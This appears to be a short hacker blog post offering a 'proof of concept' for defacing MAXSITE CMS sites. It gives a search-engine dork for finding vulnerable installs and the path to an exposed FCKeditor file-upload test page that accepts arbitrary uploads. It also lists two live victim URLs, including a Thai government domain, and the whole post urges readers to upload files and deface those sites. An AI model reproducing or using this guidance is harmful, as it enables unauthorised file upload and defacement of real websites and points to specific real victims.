[POC] CMS Maxsite Deface

Assalamualaikum my brothers :D
Nice to meet you again.
In here i'll give you one new exploit.
Maybe i'm never bored to you, and so do i :D
Okay for skip a time, lets we try.

Dork:
- intitle:"MAXSITE 1.10"

Exploit:
- http://[localhost]/patch/FCKeditor/editor/filemanager/upload/test.html

Preview:
- you can see if you success upload your file :D

Live Target:
- http://chonburi33.com/FCKeditor/editor/filemanager/upload/test.html
- http://r10.ldd.go.th/r10//FCKeditor/editor/filemanager/upload/test.html

Allowed File:
- You can test one by one, allowed or not allowed a file.
Cause i'm busy haha.

Okay just like that.
Simple FCKeditor, and full magic in there :P
Hope your lucky day ^^
Wassalamualaikum

0 Responses on "[POC] CMS Maxsite Deface"